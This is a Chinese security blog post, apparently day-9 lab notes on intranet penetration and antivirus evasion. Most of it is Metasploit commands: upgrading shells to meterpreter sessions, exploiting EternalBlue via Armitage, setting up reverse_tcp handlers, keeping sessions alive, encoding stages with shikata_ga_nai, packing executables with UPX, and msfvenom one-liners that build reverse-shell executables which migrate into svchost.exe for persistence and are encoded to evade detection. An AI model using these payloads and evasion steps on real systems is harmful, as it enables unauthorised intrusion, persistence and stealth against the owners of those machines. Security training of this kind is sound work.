freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

内网渗透 day9-免杀基础
2020-11-16 19:39:21

免杀1

1. 会话提升的几种方式

python -c "import pty;pty.spawn('/bin/bash');" 会话提升

wps63

session -u 4      将shell会话提升成meterpreter会话

wps64

wps65

直接修改payload,原来的设置的payload为shell的木马也能连上

wps66

2. armitage的熟悉

apt-get install armitage       安装

wps68

armitage   进入界面

不用改直接进入

wps70

选择快速查询

wps71

输入要查询的地址

wps72

nmap出来存活的主机有(1是物理电脑,2是网关,135是linux靶机,254是广播地址,128是win7靶机,129是本机)


wps74

拒绝访问打开服务管理器

wps75

用所有的漏洞进行探测

wps77

搜索ms17

移过去

wps79

存在永恒之蓝的漏洞

wps80

进行渗透

wps81

渗透成功

wps83


3. handler生成监听器的方法

wps85

handler -H 192.168.1.129 -P 4444 -p windows/meterpreter/reverse_tcp


4. 防止会话假死

show advanced 显示高级参数设置

set ExitOnSession false 监听到shell之后端口继续监听

wps87


wps89

set SessionCommunicationTimeout 0 设置会话存活时间,默认5分钟


wps91

set SessionExpirationTimeout 0 设置会话存活时间,默认一星期

wps92

wps93

wps94


5. 控制台设置编码

EnableStageEncoding 是否允许stage进行编码

wps96

StageEncoder 设置要用的编码

优秀的编码:x86/shikata_ga_nai、cmd/powershell_base64

wps98

6. upx加壳

加壳

wps99

upx -9 qq.exe

-1压缩更快 -9压缩更好

-d解压 -l列表压缩文件

-t测试压缩文件 -V显示版本号

-h给予更多帮助 -L显示软件许可证

测试压缩文件能否运行

wps100

upx -t qq.com            OK表示可以运行

7. msfvenom木马payload持久化

(会在运行木马的时候自动迁移到svchost.exe的对应进程中去)

wps101

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.129 lport=4444 PrependMigrate=true PrependMigrateProc=svchost.exe -f exe -o shell.exe

8. msfvenom木马编码

wps102

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.227.129 lport=4444 -e cmd/powershell_base64 -i 14 -f exe -o shell.exe

本文作者:, 转载请注明来自FreeBuf.COM

# 内网渗透 # 免杀
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按时间排序

登录/注册后在FreeBuf发布内容哦

相关推荐
  • 0 文章数
  • 0 评论数
  • 0 关注者
文章目录
登录 / 注册后在FreeBuf发布内容哦
收入专辑